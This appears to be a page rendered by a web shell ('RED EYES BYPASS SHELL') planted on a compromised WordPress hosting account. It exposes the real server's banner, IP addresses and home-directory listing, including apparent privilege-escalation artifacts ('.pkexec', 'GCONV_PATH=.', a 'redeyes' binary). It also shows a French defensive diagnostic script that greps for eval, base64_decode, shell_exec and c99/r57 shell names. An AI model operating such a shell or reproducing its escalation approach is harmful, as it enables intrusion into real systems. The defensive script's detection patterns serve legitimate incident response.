Linux webm007.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.7 | : 216.73.217.26
Cant Read [ /etc/named.conf ]
eglisebaa
RED EYES BYPASS SHELL!
/
home /
eglisebaa /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
.ssh
[ DIR ]
drwx------
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
demo
[ DIR ]
dr-xr-xr-x
ssl
[ DIR ]
drwxr-xr-x
www
[ DIR ]
drwx---r-x
.bash_history
17.05
KB
-rw-------
.bash_logout
24
B
-rw-r--r--
.bash_profile
236
B
-rw-r--r--
.bashrc
131
B
-rw-r--r--
.forward
35
B
-rw-------
.htaccess
221
B
-rw----r--
.ovhconfig
105
B
-rw----r--
.ovhconfig.backup-20260114-145705
106
B
-rw----r--
.red_eyes_root
0
B
-rw-r--r--
.viminfo
5.85
KB
-rw-------
.wget-hsts
168
B
-rw-r--r--
6digits.sh
1.44
KB
-rwx--xr-x
diagnostic-serveur.sh
9.44
KB
-rwxr-xr-x
fichiers_modifies.csv
11.33
KB
-rw-r--r--
nettoyage-backdoors-supplementaires.sh
2.38
KB
-rwxr-xr-x
nettoyage-index.php.sh
1.07
KB
-rwxr-xr-x
plan-mises-a-jour.sh
2.22
KB
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
scan-complet.sh
10.77
KB
-rwxr-xr-x
verification-mises-a-jour.sh
5.09
KB
-rwxr-xr-x
Code Editor : diagnostic-serveur.sh
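#!/bin/bash
#
# Full WordPress diagnostic script.
# Run on the server over SSH, from the WordPress directory, its parent,
# or a directory that contains it as public_html/ or www/.
#
# Output: a timestamped report directory (wp-diagnostic-YYYYmmdd-HHMMSS)
# created in the directory the script is started from. It holds the main
# report, a copy of .htaccess, lists of suspicious/recent files and a
# generated SQL file. No database query is executed by this script.
#

set -e

# The report contains a copy of .htaccess, database metadata and the paths
# of files flagged as suspicious. It may be created inside the document
# root, so keep it readable by the owner only and move it out of the web
# root once it has been reviewed.
umask 077

# Colours for terminal output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m' # No Color

# Report paths are absolute: the script changes directory to the WordPress
# root further down, and a relative path would stop resolving when that
# root is not the starting directory (set -e would then abort on the first
# write to the report).
REPORT_DIR="$(pwd)/wp-diagnostic-$(date +%Y%m%d-%H%M%S)"
REPORT_FILE="$REPORT_DIR/diagnostic-report.txt"

echo "=========================================="
echo "🔍 DIAGNOSTIC WORDPRESS COMPLET"
echo "=========================================="
echo ""

# Create the report directory
mkdir -p "$REPORT_DIR"

# Print a message (backslash escapes interpreted) to the terminal and
# append it to the main report file.
log() {
  printf '%b\n' "$1" | tee -a "$REPORT_FILE"
}

log_info() {
  log "${BLUE}ℹ️ INFO:${NC} $1"
}

log_warning() {
  log "${YELLOW}⚠️ AVERTISSEMENT:${NC} $1"
}

log_critical() {
  log "${RED}🔴 CRITIQUE:${NC} $1"
}

log_success() {
  log "${GREEN}✅ SUCCÈS:${NC} $1"
}

# Print the value of a single-quoted define('NAME', 'value') found in
# wp-config.php, or nothing when there is no match. The pipeline ends in
# head, so a missing constant does not abort the script under set -e.
# Only the first match is used; double-quoted defines are not recognised.
wp_config_value() {
  grep -oP "define\s*\(\s*'$1'\s*,\s*'\K[^']+" wp-config.php 2>/dev/null | head -n 1
}

# Locate the WordPress directory
if [ -f "wp-config.php" ]; then
  WP_ROOT="$(pwd)"
elif [ -f "../wp-config.php" ]; then
  WP_ROOT="$(cd .. && pwd)"
elif [ -f "public_html/wp-config.php" ]; then
  WP_ROOT="$(pwd)/public_html"
elif [ -f "www/wp-config.php" ]; then
  WP_ROOT="$(pwd)/www"
else
  log_critical "wp-config.php non trouvé. Veuillez exécuter ce script depuis le répertoire WordPress."
  exit 1
fi

log_info "Répertoire WordPress détecté: $WP_ROOT"
cd "$WP_ROOT"

echo "" >> "$REPORT_FILE"
log "=========================================="
log "DIAGNOSTIC WORDPRESS - $(date)"
log "Répertoire: $WP_ROOT"
log "=========================================="
log ""

# 1. WordPress core files
log_info "1. Vérification des fichiers WordPress core..."
log ""

# Check wp-config.php
if [ -f "wp-config.php" ]; then
  log_success "wp-config.php trouvé"

  # Check permissions
  PERMS=$(stat -c "%a" wp-config.php)
  if [ "$PERMS" != "600" ] && [ "$PERMS" != "644" ]; then
    log_warning "Permissions wp-config.php: $PERMS (recommandé: 600)"
  fi

  # Look for suspicious modifications
  if grep -q "eval\|base64_decode\|shell_exec" wp-config.php 2>/dev/null; then
    log_critical "Code suspect détecté dans wp-config.php!"
  fi
else
  log_critical "wp-config.php non trouvé!"
fi

# Check .htaccess
if [ -f ".htaccess" ]; then
  log_success ".htaccess trouvé"

  # Keep a copy of .htaccess with the report
  cp -- .htaccess "$REPORT_DIR/htaccess-backup.txt"

  # Check for suspicious redirects
  if grep -qi "redirect.*http" .htaccess 2>/dev/null; then
    log_warning "Redirections détectées dans .htaccess"
    grep -i "redirect" .htaccess >> "$REPORT_DIR/htaccess-redirects.txt" 2>/dev/null || true
  fi

  # PHP or script tags have no place in .htaccess
  if grep -q "<?php\|<script" .htaccess 2>/dev/null; then
    log_critical "Code suspect dans .htaccess!"
  fi
else
  log_warning ".htaccess non trouvé (peut être normal)"
fi

# Check index.php
if [ -f "index.php" ]; then
  log_success "index.php trouvé"

  # Check for modifications
  if grep -q "eval\|base64_decode" index.php 2>/dev/null; then
    log_critical "Code suspect dans index.php!"
  fi
fi

log ""

# 2. Scan for suspicious files
log_info "2. Scan des fichiers suspects..."
log ""

SUSPICIOUS_FILES="$REPORT_DIR/suspicious-files.txt"
touch "$SUSPICIOUS_FILES"

# Substring heuristic only: "exec" and "system" also match a lot of
# legitimate code, and the list is cut at 20 entries, so an empty or short
# result is not evidence that the tree is clean.
find wp-content -type f -name "*.php" \
  -exec grep -l "eval\|base64_decode\|shell_exec\|exec\|system\|passthru" {} + 2>/dev/null \
  | head -20 >> "$SUSPICIOUS_FILES" || true

# Files with suspicious names
find . -type f \( -name "*shell*" -o -name "*hack*" -o -name "*backdoor*" -o -name "*c99*" -o -name "*r57*" \) \
  2>/dev/null >> "$SUSPICIOUS_FILES" || true

# Files modified in the last 7 days
RECENT_FILES="$REPORT_DIR/recent-files.txt"
find wp-content -type f -mtime -7 -ls 2>/dev/null | head -50 > "$RECENT_FILES" || true

if [ -s "$SUSPICIOUS_FILES" ]; then
  FILE_COUNT=$(wc -l < "$SUSPICIOUS_FILES")
  log_warning "$FILE_COUNT fichier(s) suspect(s) détecté(s) - voir $SUSPICIOUS_FILES"
else
  log_success "Aucun fichier suspect évident détecté"
fi

log ""

# 3. Database analysis
log_info "3. Analyse de la base de données..."
log ""

# Stays empty when no SQL file is generated; the summary checks it.
SQL_REPORT=""

# Read the connection settings from wp-config.php. The database password
# is deliberately not read: it must not end up in the report file or on
# the terminal.
if [ -f "wp-config.php" ]; then
  DB_NAME=$(wp_config_value DB_NAME)
  DB_USER=$(wp_config_value DB_USER)

  if [ -n "$DB_NAME" ] && [ -n "$DB_USER" ]; then
    # wp-config.php on a site under investigation is untrusted input and
    # DB_NAME is pasted into the generated SQL as an identifier, so only a
    # plain identifier is accepted.
    if [[ "$DB_NAME" =~ ^[A-Za-z0-9_]+$ ]]; then
      log_success "Informations de connexion DB extraites"

      # Write the diagnostic SQL file. The queries assume the default
      # "wp_" table prefix; adjust them if $table_prefix in wp-config.php
      # is different.
      SQL_REPORT="$REPORT_DIR/database-report.sql"
      cat > "$SQL_REPORT" << EOF
-- Rapport de diagnostic WordPress
-- Date: $(date)

-- 1. Options WordPress critiques
SELECT option_name, option_value
FROM ${DB_NAME}.wp_options
WHERE option_name IN ('siteurl', 'home', 'permalink_structure', 'active_plugins')
ORDER BY option_name;

-- 2. Utilisateurs administrateurs
SELECT user_login, user_email, user_registered, display_name
FROM ${DB_NAME}.wp_users u
INNER JOIN ${DB_NAME}.wp_usermeta um ON u.ID = um.user_id
WHERE um.meta_key = 'wp_capabilities'
AND um.meta_value LIKE '%administrator%'
ORDER BY user_registered DESC;

-- 3. Plugins actifs
SELECT option_value
FROM ${DB_NAME}.wp_options
WHERE option_name = 'active_plugins';

-- 4. Options CPT UI (si présent)
SELECT option_name, option_value
FROM ${DB_NAME}.wp_options
WHERE option_name LIKE '%cptui%'
LIMIT 20;

-- 5. Posts récemment modifiés
SELECT ID, post_title, post_date, post_modified, post_status
FROM ${DB_NAME}.wp_posts
WHERE post_modified > DATE_SUB(NOW(), INTERVAL 30 DAY)
ORDER BY post_modified DESC
LIMIT 20;

-- 6. Redirections suspectes dans les options
SELECT option_name, option_value
FROM ${DB_NAME}.wp_options
WHERE option_value LIKE '%http://%'
OR option_value LIKE '%https://%'
LIMIT 50;
EOF

      log_info "Script SQL de diagnostic créé: $SQL_REPORT"
      # "-p" without a value makes the client prompt for the password, so
      # the secret is neither logged here nor exposed in the process list.
      log_info "Pour exécuter: mysql -u $DB_USER -p $DB_NAME < $SQL_REPORT"
    else
      log_warning "Nom de base de données inattendu dans wp-config.php - script SQL non généré"
    fi
  else
    log_warning "Impossible d'extraire les informations de connexion DB"
  fi
else
  log_warning "wp-config.php non trouvé pour l'analyse DB"
fi

log ""

# 4. Plugin analysis
log_info "4. Analyse des plugins..."
log ""

PLUGINS_DIR="wp-content/plugins"
if [ -d "$PLUGINS_DIR" ]; then
  # -mindepth 1 leaves the plugins directory itself out of the count
  PLUGIN_COUNT=$(find "$PLUGINS_DIR" -mindepth 1 -maxdepth 1 -type d | wc -l)
  log_info "Nombre de plugins: $((PLUGIN_COUNT))"

  PLUGINS_REPORT="$REPORT_DIR/plugins-list.txt"
  ls -lah "$PLUGINS_DIR" > "$PLUGINS_REPORT"

  # Plugin files matching the suspicious-code heuristic (first 10 only)
  SUSPICIOUS_PLUGINS=$(find "$PLUGINS_DIR" -type f -name "*.php" \
    -exec grep -l "eval\|base64_decode\|shell_exec" {} + 2>/dev/null | head -10)
  if [ -n "$SUSPICIOUS_PLUGINS" ]; then
    log_warning "Plugins avec code suspect détectés"
    printf '%s\n' "$SUSPICIOUS_PLUGINS" >> "$REPORT_DIR/suspicious-plugins.txt"
  fi

  # Check for Custom Post Type UI
  if [ -d "$PLUGINS_DIR/custom-post-type-ui" ]; then
    log_success "Custom Post Type UI trouvé"
  else
    log_warning "Custom Post Type UI non trouvé"
  fi
else
  log_critical "Répertoire plugins non trouvé!"
fi

log ""

# 5. Theme analysis
log_info "5. Analyse des thèmes..."
log ""

THEMES_DIR="wp-content/themes"
if [ -d "$THEMES_DIR" ]; then
  THEME_COUNT=$(find "$THEMES_DIR" -mindepth 1 -maxdepth 1 -type d | wc -l)
  log_info "Nombre de thèmes: $((THEME_COUNT))"

  # Theme files matching the suspicious-code heuristic (first 10 only)
  THEME_SUSPICIOUS=$(find "$THEMES_DIR" -type f -name "*.php" \
    -exec grep -l "eval\|base64_decode" {} + 2>/dev/null | head -10)
  if [ -n "$THEME_SUSPICIOUS" ]; then
    log_warning "Thèmes avec code suspect détectés"
    printf '%s\n' "$THEME_SUSPICIOUS" >> "$REPORT_DIR/suspicious-themes.txt"
  fi
fi

log ""

# 6. Permission checks
log_info "6. Vérification des permissions..."
log ""

# Check wp-config.php permissions
if [ -f "wp-config.php" ]; then
  PERMS=$(stat -c "%a" wp-config.php)
  if [ "$PERMS" = "600" ] || [ "$PERMS" = "644" ]; then
    log_success "Permissions wp-config.php: $PERMS"
  else
    log_warning "Permissions wp-config.php: $PERMS (recommandé: 600)"
  fi
fi

# Directories with mode 777 or 775. The match is anchored on the mode
# column (with an optional setuid/setgid/sticky digit) so that a directory
# whose name merely contains "777" or "775" is not reported.
DIRS_PERMS="$REPORT_DIR/directories-permissions.txt"
find . -type d -exec stat -c "%a %n" {} + 2>/dev/null \
  | grep -E '^[0-7]?(777|775) ' | head -20 > "$DIRS_PERMS" || true

if [ -s "$DIRS_PERMS" ]; then
  log_warning "Répertoires avec permissions trop ouvertes détectés"
fi

log ""

# 7. Summary
log "=========================================="
log "RÉSUMÉ DU DIAGNOSTIC"
log "=========================================="
log ""
log "Rapport complet sauvegardé dans: $REPORT_DIR"
log ""
log "Fichiers générés:"
log " - $REPORT_FILE (rapport principal)"
log " - $SUSPICIOUS_FILES (fichiers suspects)"
# Listed only when the SQL file was actually written
if [ -n "$SQL_REPORT" ]; then
  log " - $SQL_REPORT (requêtes SQL de diagnostic)"
fi
log " - $RECENT_FILES (fichiers récemment modifiés)"
log ""
log "Prochaines étapes:"
log " 1. Examiner les fichiers suspects"
log " 2. Exécuter les requêtes SQL pour analyser la DB"
log " 3. Vérifier les plugins et thèmes suspects"
log " 4. Corriger les problèmes identifiés"
log ""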